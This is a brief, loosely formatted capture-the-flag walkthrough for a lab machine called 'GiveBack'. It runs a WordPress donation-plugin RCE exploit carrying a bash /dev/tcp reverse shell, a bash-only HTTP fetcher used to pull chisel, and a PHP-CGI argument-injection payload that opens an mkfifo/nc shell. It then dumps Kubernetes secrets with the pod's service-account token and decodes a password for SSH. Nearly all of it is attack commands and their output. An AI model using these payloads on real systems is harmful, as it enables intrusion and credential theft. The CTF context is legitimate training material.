GiveBack - Medium

Nmap

nmap 10.129.242.171 -sV -sC -T3 -vvv

got port 80 so http there

now do wpscan using your API TOKEN

wpscan --url http://10.129.242.171 --api-token

then you'll get CVE

cd CVE
python CVE-2024-5932-rce.py -u http://10.129.242.171/donations/the-things-we-need/ -c 'bash -c "bash -i >& /dev/tcp/10.10.14.28/4001 0>&1"'                                                                                   
python3 -m venv .venc
pip install -r requirements.txt
env  ~find legacy

now get curl command on victims machine

function __curl() {
  read -r proto server path <<<"$(printf '%s' "${1//// }")"
  if [ "$proto" != "http:" ]; then
    printf >&2 "sorry, %s supports only http\n" "${FUNCNAME[0]}"
    return 1
  fi
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [ "${HOST}" = "${PORT}" ] && PORT=80
  exec 3<>"/dev/tcp/${HOST}/$PORT"
  printf 'GET %s HTTP/1.0\r\nHost: %s\r\n\r\n' "${DOC}" "${HOST}" >&3
  (while read -r line; do
   [ "$line" = $'\r' ] && break
  done && cat) <&3
  exec 3>&-
}

now use it to get tool chisel for port forwarding

Victims machine 
__curl http://<ip>:8000/chisel > chisel 

Attacker machine
python3 -m http.server

use chisel now for port forwarding

CHISEL | sn0xsharmasn0xs-organization.gitbook.io

do further and reach here

[sher@Sher ~]$ nc -nvlp 4001
Listening on 0.0.0.0 4001

Connection received on 10.129.242.171 11471
sh: can't access tty; job control turned off
/var/www/html/cgi-bin #

OPTION 2 :

using PHP

php -r '$p="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.62 8447 > /tmp/f"; $o = ["http"=>["method"=>"POST", "header"=>"Content-Type: application/x-www-form-urlencoded","content"=>$p,"timeout"=>4]]; $c=stream_context_create($o); $r=@file_get_contents("http://legacy-intranet-service:5000/cgi-bin/php-cgi?--define+allow_url_include%3don+--define+auto_prepend_file%3dphp://input",false,$c); echo $r===false?"":substr($r,0,5000);'

then we get the same output :

[sher@Sher ~]$ nc -nvlp 4001
Listening on 0.0.0.0 4001

Connection received on 10.129.242.171 11471
sh: can't access tty; job control turned off
/var/www/html/cgi-bin #

next step 😄

# Uses the cluster’s internal CA certificate to verify the Kubernetes API server.

--cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt

# Authenticates to the Kubernetes API

-H "Authorization: Bearer $(cat .../token)"

#3️API URL → Requests all secrets from the current namespace via the Kubernetes API.

https://kubernetes.default.svc/api/v1/namespaces/$(cat .../namespace)/secrets

# Saves the API response into a file.

> secrets.json

combining whole command

curl --cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/$(cat /run/secrets/kubernetes.io/serviceaccount/namespace)/secrets > secrets.json

  },
      "type": "helm.sh/release.v1"
    },
    {
      "metadata": {
        "name": "user-secret-babywyrm",
        "namespace": "default",
        "uid": "b035359e-70af-409c-885d-820a2e08668d",
        "resourceVersion": "2857758",
        "creationTimestamp": "2026-02-28T09:58:30Z",
        "ownerReferences": [
          {
            "apiVersion": "bitnami.com/v1alpha1",
            "kind": "SealedSecret",
            "name": "user-secret-babywyrm",
            "uid": "3fc068c0-71a2-40a7-ae4a-1224781c2332",
            "controller": true
          }
        ],
        "managedFields": [
          {
            "manager": "controller",
            "operation": "Update",
            "apiVersion": "v1",
            "time": "2026-02-28T09:58:30Z",
            "fieldsType": "FieldsV1",
            "fieldsV1": {
              "f:data": {
                ".": {},
                "f:MASTERPASS": {}
              },
              "f:metadata": {
                "f:ownerReferences": {
                  ".": {},
                  "k:{\"uid\":\"3fc068c0-71a2-40a7-ae4a-1224781c2332\"}": {}
                }
              },
              "f:type": {}
            }
          }
        ]
      },
      "data": {
        "MASTERPASS": "b3YwaXIxR1NTcENrT2plSno3T2JpckdKRFVBMlNscQ=="
      },
      "type": "Opaque"
    }
  ]
100 1169k    0 1169k    0     0  1479k      0 --:--:-- --:--:100 1169k    0 1169k    0     0  1478k      0 --:--:-- --:--:-- --:--:-- 1480k
/var/www/html/cgi-bin # [sher@Sher ~]$ echo "b3YwaXIxR1NTcENrT2plSno3T2JpckdKRFVBMlNscQ==" | base64 -d^C

  0     0    0     0    0     0      0      0 --:--:-- --:--:100 1169k    0 1169k    0     0  31.8M      0 --:--:-- --:--:-- --:--:-- 32.6M

[sher@Sher ~]$ echo "b3YwaXIxR1NTcENrT2plSno3T2JpckdKRFVBMlNscQ==" | base64 -d

ov0ir1GSSpCkOjeJz7ObirGJDUA2Slq

now do ssh

ssh [email protected] 

ov0ir1GSSpCkOjeJz7ObirGJDUA2Slq

first flag :

babywyrm@giveback:~$ ls
user.txt
babywyrm@giveback:~$ cat user.txt
dff3eb5a863eff826e5a5ced239971ee
babywyrm@giveback:~$

PreviousPuppet - Advance Lab NextKUBERNATES

Last updated 3 hours ago

Was this helpful?

Good afternoon

hashtagthen you'll get CVE

then you'll get CVE